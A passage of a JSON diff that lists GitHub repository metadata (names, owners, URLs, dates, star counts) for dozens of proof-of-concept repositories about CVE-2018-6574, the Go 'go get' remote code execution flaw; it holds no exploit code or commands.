"stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 162044535, + "name": "CVE-2018-6574-POC", + "full_name": "20matan\/CVE-2018-6574-POC", + "owner": { + "login": "20matan", + "id": 10909504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10909504?v=4", + "html_url": "https:\/\/github.com\/20matan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/20matan\/CVE-2018-6574-POC", + "description": null, + "fork": false, + "created_at": "2018-12-16T21:55:27Z", + "updated_at": "2018-12-16T22:02:50Z", + "pushed_at": "2018-12-16T22:02:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 163056409, + "name": "Zur-Go-GET-RCE-Solution", + "full_name": "zur250\/Zur-Go-GET-RCE-Solution", + "owner": { + "login": "zur250", + "id": 14151749, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14151749?v=4", + "html_url": "https:\/\/github.com\/zur250", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zur250\/Zur-Go-GET-RCE-Solution", + "description": "CVE-2018-6574", + "fork": false, + "created_at": "2018-12-25T07:08:55Z", + "updated_at": "2018-12-25T07:48:09Z", + "pushed_at": "2020-05-05T05:28:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 163621881, + "name": "cve-2018-6574", + "full_name": "mekhalleh\/cve-2018-6574", + "owner": { + "login": "mekhalleh", + "id": 5225129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5225129?v=4", + "html_url": "https:\/\/github.com\/mekhalleh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mekhalleh\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2018-12-30T22:30:01Z", + "updated_at": "2024-08-12T19:44:27Z", + "pushed_at": "2019-04-29T13:24:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 165045501, + "name": "go-get-rce", + "full_name": "veter069\/go-get-rce", + "owner": { + "login": "veter069", + "id": 4894034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4894034?v=4", + "html_url": "https:\/\/github.com\/veter069", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veter069\/go-get-rce", + "description": "CVE-2018-6574", + "fork": false, + "created_at": "2019-01-10T11:09:06Z", + "updated_at": "2019-01-11T05:02:16Z", + "pushed_at": "2019-01-11T05:02:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 166348598, + "name": "CVE-2018-6574-POC", + "full_name": "duckzsc2\/CVE-2018-6574-POC", + "owner": { + "login": "duckzsc2", + "id": 6966941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6966941?v=4", + "html_url": "https:\/\/github.com\/duckzsc2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duckzsc2\/CVE-2018-6574-POC", + "description": null, + "fork": false, + "created_at": "2019-01-18T05:22:25Z", + "updated_at": "2019-01-21T00:16:50Z", + "pushed_at": "2019-01-21T00:16:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 176511633, + "name": "cve-2018-6574", + "full_name": "dollyptm\/cve-2018-6574", + "owner": { + "login": "dollyptm", + "id": 11349615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11349615?v=4", + "html_url": "https:\/\/github.com\/dollyptm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dollyptm\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2019-03-19T12:54:23Z", + "updated_at": "2019-03-19T12:54:23Z", + "pushed_at": "2019-03-19T12:54:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 180108074, + "name": "CVE-2018-6574", + "full_name": "qweraqq\/CVE-2018-6574", + "owner": { + "login": "qweraqq", + "id": 5697699, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5697699?v=4", + "html_url": "https:\/\/github.com\/qweraqq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qweraqq\/CVE-2018-6574", + "description": "A simple POC for CVE-2018-6574", + "fork": false, + "created_at": "2019-04-08T08:49:44Z", + "updated_at": "2019-04-08T08:58:44Z", + "pushed_at": "2022-03-10T11:29:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 182260633, + "name": "go-get-rce", + "full_name": "d4rkshell\/go-get-rce", + "owner": { + "login": "d4rkshell", + "id": 22564423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22564423?v=4", + "html_url": "https:\/\/github.com\/d4rkshell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4rkshell\/go-get-rce", + "description": "CVE-2018-6574", + "fork": false, + "created_at": "2019-04-19T12:21:41Z", + "updated_at": "2019-04-19T12:23:14Z", + "pushed_at": "2019-04-19T12:22:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 187050013, + "name": "CVE-2018-6574", + "full_name": "chaosura\/CVE-2018-6574", + "owner": { + "login": "chaosura", + "id": 6890211, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6890211?v=4", + "html_url": "https:\/\/github.com\/chaosura", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chaosura\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2019-05-16T15:02:22Z", + "updated_at": "2019-05-18T08:52:29Z", + "pushed_at": "2019-05-18T08:52:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 198226341, + "name": "ptl6574", + "full_name": "french560\/ptl6574", + "owner": { + "login": "french560", + "id": 31295259, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31295259?v=4", + "html_url": "https:\/\/github.com\/french560", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/french560\/ptl6574", + "description": "ptl cve-2018-6574", + "fork": false, + "created_at": "2019-07-22T13:13:06Z", + "updated_at": "2019-07-23T10:14:35Z", + "pushed_at": "2019-07-23T10:14:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 209576898, + "name": "CVE-2018-6574", + "full_name": "InfoSecJack\/CVE-2018-6574", + "owner": { + "login": "InfoSecJack", + "id": 24259204, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24259204?v=4", + "html_url": "https:\/\/github.com\/InfoSecJack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InfoSecJack\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2019-09-19T14:36:45Z", + "updated_at": "2019-09-19T14:39:20Z", + "pushed_at": "2019-09-19T14:39:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 218048404, + "name": "CVE-2018-6574", + "full_name": "asavior2\/CVE-2018-6574", + "owner": { + "login": "asavior2", + "id": 25458332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25458332?v=4", + "html_url": "https:\/\/github.com\/asavior2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asavior2\/CVE-2018-6574", + "description": "CVE-2018-6574 go get RCE", + "fork": false, + "created_at": "2019-10-28T13:05:12Z", + "updated_at": "2019-10-30T21:47:37Z", + "pushed_at": "2019-10-30T21:47:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 224866950, + "name": "golang", + "full_name": "drset\/golang", + "owner": { + "login": "drset", + "id": 607329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/607329?v=4", + "html_url": "https:\/\/github.com\/drset", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drset\/golang", + "description": "test for CVE-2018-6574: go get RCE pentesterlab", + "fork": false, + "created_at": "2019-11-29T14:12:57Z", + "updated_at": "2019-11-29T14:27:34Z", + "pushed_at": "2019-11-29T14:27:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 225294211, + "name": "CVE-2018-6574", + "full_name": "frozenkp\/CVE-2018-6574", + "owner": { + "login": "frozenkp", + "id": 17706351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17706351?v=4", + "html_url": "https:\/\/github.com\/frozenkp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/frozenkp\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2019-12-02T05:40:07Z", + "updated_at": "2022-03-18T06:50:44Z", + "pushed_at": "2022-03-16T08:57:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 231344778, + "name": "cve-2018-6574-payload", + "full_name": "kev-ho\/cve-2018-6574-payload", + "owner": { + "login": "kev-ho", + "id": 8200026, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8200026?v=4", + "html_url": "https:\/\/github.com\/kev-ho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kev-ho\/cve-2018-6574-payload", + "description": "pentesterlab test payload", + "fork": false, + "created_at": "2020-01-02T09:03:25Z", + "updated_at": "2020-01-02T11:16:21Z", + "pushed_at": "2020-01-02T11:16:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 232200117, + "name": "cve-2018-6574", + "full_name": "sdosis\/cve-2018-6574", + "owner": { + "login": "sdosis", + "id": 9918639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9918639?v=4", + "html_url": "https:\/\/github.com\/sdosis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sdosis\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-01-06T22:56:25Z", + "updated_at": "2020-01-06T23:02:07Z", + "pushed_at": "2020-01-06T23:02:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 234716899, + "name": "CVE-2018-6574-PoC", + "full_name": "No1zy\/CVE-2018-6574-PoC", + "owner": { + "login": "No1zy", + "id": 22188439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22188439?v=4", + "html_url": "https:\/\/github.com\/No1zy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/No1zy\/CVE-2018-6574-PoC", + "description": null, + "fork": false, + "created_at": "2020-01-18T10:21:08Z", + "updated_at": "2020-01-18T11:14:03Z", + "pushed_at": "2020-01-18T11:14:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 244931041, + "name": "CVE-2018-6574", + "full_name": "nthuong95\/CVE-2018-6574", + "owner": { + "login": "nthuong95", + "id": 26857031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26857031?v=4", + "html_url": "https:\/\/github.com\/nthuong95", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nthuong95\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-03-04T15:08:47Z", + "updated_at": "2020-03-04T15:19:17Z", + "pushed_at": "2020-03-04T15:19:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 245465268, + "name": "CVE-2018-6574", + "full_name": "AdriVillaB\/CVE-2018-6574", + "owner": { + "login": "AdriVillaB", + "id": 1714030, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1714030?v=4", + "html_url": "https:\/\/github.com\/AdriVillaB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdriVillaB\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-03-06T16:17:07Z", + "updated_at": "2020-03-06T16:32:41Z", + "pushed_at": "2020-03-06T16:32:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 247807828, + "name": "CVE-2018-6574_demo", + "full_name": "yitingfan\/CVE-2018-6574_demo", + "owner": { + "login": "yitingfan", + "id": 17982252, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17982252?v=4", + "html_url": "https:\/\/github.com\/yitingfan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yitingfan\/CVE-2018-6574_demo", + "description": null, + "fork": false, + "created_at": "2020-03-16T20:13:47Z", + "updated_at": "2020-03-16T21:12:14Z", + "pushed_at": "2020-03-16T21:12:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 248533681, + "name": "CVE-2018-6574", + "full_name": "mhamed366\/CVE-2018-6574", + "owner": { + "login": "mhamed366", + "id": 20161571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20161571?v=4", + "html_url": "https:\/\/github.com\/mhamed366", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhamed366\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-03-19T15:09:11Z", + "updated_at": "2020-11-05T00:39:45Z", + "pushed_at": "2020-11-05T00:39:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 254069736, + "name": "CVE-2018-6574", + "full_name": "Eugene24\/CVE-2018-6574", + "owner": { + "login": "Eugene24", + "id": 5593797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5593797?v=4", + "html_url": "https:\/\/github.com\/Eugene24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eugene24\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-04-08T11:33:46Z", + "updated_at": "2020-04-08T11:45:31Z", + "pushed_at": "2020-04-08T11:45:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 259851239, + "name": "CVE-2018-6574", + "full_name": "coblax\/CVE-2018-6574", + "owner": { + "login": "coblax", + "id": 51140182, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51140182?v=4", + "html_url": "https:\/\/github.com\/coblax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/coblax\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-04-29T07:08:13Z", + "updated_at": "2020-04-29T07:47:11Z", + "pushed_at": "2020-04-29T07:47:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 265647598, + "name": "CVE-2018-6574", + "full_name": "darthvader-htb\/CVE-2018-6574", + "owner": { + "login": "darthvader-htb", + "id": 57115903, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57115903?v=4", + "html_url": "https:\/\/github.com\/darthvader-htb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darthvader-htb\/CVE-2018-6574", + "description": "CVE-2018-6574", + "fork": false, + "created_at": "2020-05-20T18:05:30Z", + "updated_at": "2020-05-20T18:50:16Z", + "pushed_at": "2020-05-20T18:50:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 271655033, + "name": "CVE-2018-6574", + "full_name": "it3x55\/CVE-2018-6574", + "owner": { + "login": "it3x55", + "id": 64153980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64153980?v=4", + "html_url": "https:\/\/github.com\/it3x55", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/it3x55\/CVE-2018-6574", + "description": "Vulnerble-code", + "fork": false, + "created_at": "2020-06-11T22:03:06Z", + "updated_at": "2020-06-12T00:46:37Z", + "pushed_at": "2020-06-12T00:46:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 273980806, + "name": "CVE-2018-6574-go-get-RCE", + "full_name": "Malone5923\/CVE-2018-6574-go-get-RCE", + "owner": { + "login": "Malone5923", + "id": 4997898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4997898?v=4", + "html_url": "https:\/\/github.com\/Malone5923", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malone5923\/CVE-2018-6574-go-get-RCE", + "description": "CVE-2018-6574: go get RCE solution for pentesterlab challenge", + "fork": false, + "created_at": "2020-06-21T20:43:53Z", + "updated_at": "2021-06-13T20:16:05Z", + "pushed_at": "2020-06-21T20:54:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 281225112, + "name": "CVE-2018-6574", + "full_name": "illnino\/CVE-2018-6574", + "owner": { + "login": "illnino", + "id": 1298646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1298646?v=4", + "html_url": "https:\/\/github.com\/illnino", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/illnino\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-07-20T21:02:43Z", + "updated_at": "2020-07-20T21:24:10Z", + "pushed_at": "2020-07-20T21:24:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 291030387, + "name": "CVE-2018-6574", + "full_name": "TakuCoder\/CVE-2018-6574", + "owner": { + "login": "TakuCoder", + "id": 13318707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13318707?v=4", + "html_url": "https:\/\/github.com\/TakuCoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TakuCoder\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-08-28T11:32:45Z", + "updated_at": "2020-08-28T11:37:29Z", + "pushed_at": "2020-08-28T11:37:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 295078439, + "name": "cve-2018-6574", + "full_name": "kawkab101\/cve-2018-6574", + "owner": { + "login": "kawkab101", + "id": 64027686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64027686?v=4", + "html_url": "https:\/\/github.com\/kawkab101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kawkab101\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-09-13T04:34:58Z", + "updated_at": "2020-09-13T04:50:52Z", + "pushed_at": "2020-09-13T04:50:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 299110384, + "name": "cve-2018-6574", + "full_name": "lsnakazone\/cve-2018-6574", + "owner": { + "login": "lsnakazone", + "id": 19561374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19561374?v=4", + "html_url": "https:\/\/github.com\/lsnakazone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsnakazone\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-09-27T20:08:49Z", + "updated_at": "2020-09-27T20:15:07Z", + "pushed_at": "2020-09-27T20:15:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 303623611, + "name": "CVE-2018-6574", + "full_name": "pswalia2u\/CVE-2018-6574", + "owner": { + "login": "pswalia2u", + "id": 20887270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20887270?v=4", + "html_url": "https:\/\/github.com\/pswalia2u", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pswalia2u\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-10-13T07:32:04Z", + "updated_at": "2020-10-13T07:48:30Z", + "pushed_at": "2020-10-13T07:48:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 306213388, + "name": "CVE-2018-6574-POC", + "full_name": "jongmartinez\/CVE-2018-6574-POC", + "owner": { + "login": "jongmartinez", + "id": 11743460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11743460?v=4", + "html_url": "https:\/\/github.com\/jongmartinez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jongmartinez\/CVE-2018-6574-POC", + "description": "A simple POC for CVE-2018-6574", + "fork": false, + "created_at": "2020-10-22T03:35:44Z", + "updated_at": "2020-10-22T03:48:07Z", + "pushed_at": "2020-10-22T03:48:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 311923690, + "name": "CVE-2018-6574", + "full_name": "azzzzzzzzzzzzzzzzz\/CVE-2018-6574", + "owner": { + "login": "azzzzzzzzzzzzzzzzz", + "id": 74295501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74295501?v=4", + "html_url": "https:\/\/github.com\/azzzzzzzzzzzzzzzzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/azzzzzzzzzzzzzzzzz\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-11-11T09:34:22Z", + "updated_at": "2020-11-11T09:34:22Z", + "pushed_at": "2020-11-11T09:34:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 322346332, + "name": "CVE-2018-6574", + "full_name": "noname-nohost\/CVE-2018-6574", + "owner": { + "login": "noname-nohost", + "id": 59435851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59435851?v=4", + "html_url": "https:\/\/github.com\/noname-nohost", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/noname-nohost\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-12-17T16:09:07Z", + "updated_at": "2020-12-17T16:15:08Z", + "pushed_at": "2020-12-17T16:15:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 323352519, + "name": "CVE-2018-6574", + "full_name": "shadofren\/CVE-2018-6574", + "owner": { + "login": "shadofren", + "id": 8515519, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8515519?v=4", + "html_url": "https:\/\/github.com\/shadofren", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shadofren\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-12-21T14:01:41Z", + "updated_at": "2020-12-21T14:05:31Z", + "pushed_at": "2020-12-21T14:05:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 323730181, + "name": "cve-2018-6574", + "full_name": "NikolaT3sla\/cve-2018-6574", + "owner": { + "login": "NikolaT3sla", + "id": 63161551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63161551?v=4", + "html_url": "https:\/\/github.com\/NikolaT3sla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NikolaT3sla\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2020-12-22T20:50:06Z", + "updated_at": "2020-12-22T21:05:17Z", + "pushed_at": "2020-12-22T21:05:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 325280690, + "name": "CVE-2018-6574", + "full_name": "vishack\/CVE-2018-6574", + "owner": { + "login": "vishack", + "id": 57520457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57520457?v=4", + "html_url": "https:\/\/github.com\/vishack", + "user_view_type": "public" + }, + "html_url": 